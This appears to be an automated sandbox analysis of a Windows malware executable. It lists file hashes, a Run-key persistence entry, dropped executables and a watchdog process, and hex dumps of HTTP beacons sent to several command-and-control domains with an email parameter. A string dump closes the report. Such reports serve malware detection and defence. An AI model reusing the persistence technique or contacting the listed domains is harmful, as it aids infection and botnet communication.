Analysis Date: 2015-05-12 22:24:06

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 6bec07fe9346382393eaa860b1b978cc sha1: ae74a0bc782a4ef36d903e9bf4b65cc4ad336c91 size: 299008
Section .rdata md5: 57e7aeb8f32201572b1c946ab0ea2c02 sha1: 48cc25461cf837c68c9a91b02f3101bb04e9c865 size: 35840
Section md5: 073095ddaab6f51e715fcad070180579 sha1: 4791104e050861a0255337937b21bc79f3e2d6f6 size: 95232
Timestamp: 2014-10-30 09:49:37
Packer: Microsoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\User Extender Name Auto Collector Port Security ➝
C:\Documents and Settings\Administrator\Application Data\mjnqqqknuzlna\eoysabvthxjx.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\mjnqqqknuzlna\eoysabvthxjx.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\mjnqqqknuzlna\eoysabvthxjx.exe

↳ C:\Documents and Settings\Administrator\Application Data\mjnqqqknuzlna\eoysabvthxjx.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\mjnqqqknuzlna\sxxuywqqp.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\mjnqqqknuzlna\eoysabvthxjx.vz
Creates File: \Device\Afd\Endpoint
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\mjnqqqknuzlna\eoysabvthxjx.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\mjnqqqknuzlna\eoysabvthxjx.exe"

Network Details:
Type: A (repeated for 87 DNS queries)
Flows TCP: 192.168.1.1:1031 ➝
Flows TCP: 192.168.1.1:1032 ➝
Flows TCP: 192.168.1.1:1033 ➝
Flows TCP: 192.168.1.1:1034 ➝
Flows TCP: 192.168.1.1:1035 ➝
Flows TCP: 192.168.1.1:1036 ➝
Flows TCP: 192.168.1.1:1037 ➝
Flows TCP: 192.168.1.1:1038 ➝
Flows TCP: 192.168.1.1:1039 ➝
Flows TCP: 192.168.1.1:1040 ➝
Flows TCP: 192.168.1.1:1041 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468   alms.com.br&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 74726164   lose..Host: trad
0x00000070 (00112)   65736574 746c652e 6e65740d 0a0d0a     esettle.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468   alms.com.br&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 73747265   lose..Host: stre
0x00000070 (00112)   65746465 76696365 2e6e6574 0d0a0d0a   etdevice.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468   alms.com.br&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 62657474   lose..Host: bett
0x00000070 (00112)   65726465 76696365 2e6e6574 0d0a0d0a   erdevice.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468   alms.com.br&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 666c6965   lose..Host: flie
0x00000070 (00112)   72626566 6f72652e 6e65740d 0a0d0a0a   rbefore.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468   alms.com.br&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 6e696768   lose..Host: nigh
0x00000070 (00112)   74737072 696e672e 6e65740d 0a0d0a0a   tspring.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468   alms.com.br&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 63617074   lose..Host: capt
0x00000070 (00112)   61696e73 75636365 73732e6e 65740d0a   ainsuccess.net..
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468   alms.com.br&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 656c6563   lose..Host: elec
0x00000070 (00112)   74726963 73707269 6e672e6e 65740d0a   tricspring.net..
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468   alms.com.br&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 74726164   lose..Host: trad
0x00000070 (00112)   65737072 696e672e 6e65740d 0a0d0a0a   espring.net....
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468   alms.com.br&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 73747265   lose..Host: stre
0x00000070 (00112)   65747375 63636573 732e6e65 740d0a0d   etsuccess.net...
0x00000080 (00128)   0a0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468   alms.com.br&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 73747265   lose..Host: stre
0x00000070 (00112)   65746261 6e6b6572 2e6e6574 0d0a0d0a   etbanker.net....
0x00000080 (00128)   0a0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468   alms.com.br&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 62657474   lose..Host: bett
0x00000070 (00112)   65727375 63636573 732e6e65 740d0a0d   ersuccess.net...
0x00000080 (00128)   0a                                    .

@E8E,E E
         (((((                  H
         h((((                  H
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
j@j ^V
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
TLOSS error
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
-~zUueofte xhn olifnimmn qpme dzg rrojegof gcafu mklui fghi kde fcqenrejuf iworvuo ayn ikejlopfm azgyizfito tip pbeepuz bedaz ebdme kblocrno yycoa jqsi psbesqay ftbewitg dsjedm fagjiasm iczubusd legjojjn qvoyakv cgcecjr zstilycemr abdcejiab syfomjz gkgik jcqieakrsa pfn uvfb eaepngukfs gagtufpm jrsidsn pur efczolvb ncb gcsegrmu dnjubhga sgs qgfodf wngeonmp yeasvedq yimb ngcaiegb dpbescje gnbaiunb lzeekobjn npr rbcujnie lmheuqoz pyf umspodpuoe cunarapgm ixni rrbujsef felzom znriefmjoz khj kfsunzma ftyef